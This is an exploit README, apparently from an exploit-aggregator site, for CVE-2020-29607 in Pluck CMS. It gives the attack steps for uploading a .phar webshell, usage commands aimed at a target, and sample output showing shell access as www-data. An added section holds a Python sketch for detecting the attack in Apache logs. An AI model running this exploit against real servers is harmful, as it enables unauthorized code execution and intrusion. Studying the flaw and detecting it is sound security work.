## https://sploitus.com/exploit?id=0FC9E8C6-E42F-52B6-A03F-37D1B617D7A2
# CVE-2020-29607 — Pluck CMS

Authenticated remote code execution in Pluck CMS before 4.7.13. The admin file manager (`admin.php?action=files`) does not validate file extensions, allowing upload of `.phar` files which Apache executes as PHP. Uploading a webshell through this endpoint results in RCE as the web server user.

---

## How it works

1. Authenticates using the provided admin password.
2. Uploads a PHP webshell as `shell.phar` via the admin file manager.
3. Verifies execution by requesting the shell and running `id`.
4. Opens an interactive command loop against the uploaded webshell.
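
The sequence above leaves a recognisable trail in the web server's access log: a POST to the file manager followed by a successful request for a PHP-executable file under `files/`. The following detection sketch is an added example, not part of this PoC or the original exploit; it assumes Apache common/combined log format, and the function name, extension list and sample log lines are constructed for illustration.

```python
import re

# Extensions commonly mapped to the PHP handler (assumed list; match it to
# the server's own handler configuration).
PHP_EXEC_EXT = (".phar", ".php", ".phtml", ".php5", ".php7")

# Apache common/combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

def find_exec_requests(lines, base_path=""):
    """Return (ip, uri, uploaded_first) for every 200 response to a
    PHP-executable file under <base_path>/files/. uploaded_first is True
    when the same client POSTed to the file manager earlier in the log."""
    upload_uri = base_path + "/admin.php?action=files"
    files_prefix = base_path + "/files/"
    uploaders, hits = set(), []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, uri, status = m.group("ip", "method", "uri", "status")
        path = uri.split("?", 1)[0]  # ignore any query string
        if method == "POST" and uri.startswith(upload_uri):
            uploaders.add(ip)
        elif (path.startswith(files_prefix) and status == "200"
              and path.lower().endswith(PHP_EXEC_EXT)):
            hits.append((ip, uri, ip in uploaders))
    return hits

# Constructed sample log lines (not captured from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:02 +0000] "POST /admin.php?action=files HTTP/1.1" 200 2048',
    '192.0.2.10 - - [01/Jan/2024:10:00:03 +0000] "GET /files/shell.phar HTTP/1.1" 200 54',
    '198.51.100.7 - - [01/Jan/2024:10:05:00 +0000] "GET /files/logo.png HTTP/1.1" 200 9000',
    '198.51.100.7 - - [01/Jan/2024:10:06:00 +0000] "GET /files/shell.phar HTTP/1.1" 200 54',
]

if __name__ == "__main__":
    for ip, uri, uploaded in find_exec_requests(SAMPLE_LOG):
        note = "after file-manager upload" if uploaded else "no upload seen from this client"
        print(f"{ip} was served {uri} ({note})")
```

Pass `base_path="/pluck"` when Pluck is installed in a subdirectory. Any hit is worth investigating, since nothing under `files/` should be handled by the PHP interpreter.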

## Requirements

- Python 3
- Install dependencies:

```bash
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
```

## Usage

```bash
# Pluck at root
python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD

# Pluck in a subdirectory
python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD --path /pluck
```

**Example:**

```
$ python3 exploit.py -u http://10.10.10.10 -p admin123
[*] Logging in...
[+] Logged in
[*] Uploading webshell...
[+] Webshell uploaded
[*] Shell URL: http://10.10.10.10/files/shell.phar
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.

Shell> whoami
www-data
```

## References

- [CVE-2020-29607](https://nvd.nist.gov/vuln/detail/CVE-2020-29607)
- [EDB-49909](https://www.exploit-db.com/exploits/49909)
- [Original PoC by Ron Jost (Hacker5preme)](https://github.com/Hacker5preme/Exploits)

## Credits

- **Discovery & original exploit:** Ron Jost (Hacker5preme)
- **Python 3 port & interactive shell:** [Esteban Zárate](https://github.com/estebanzarate)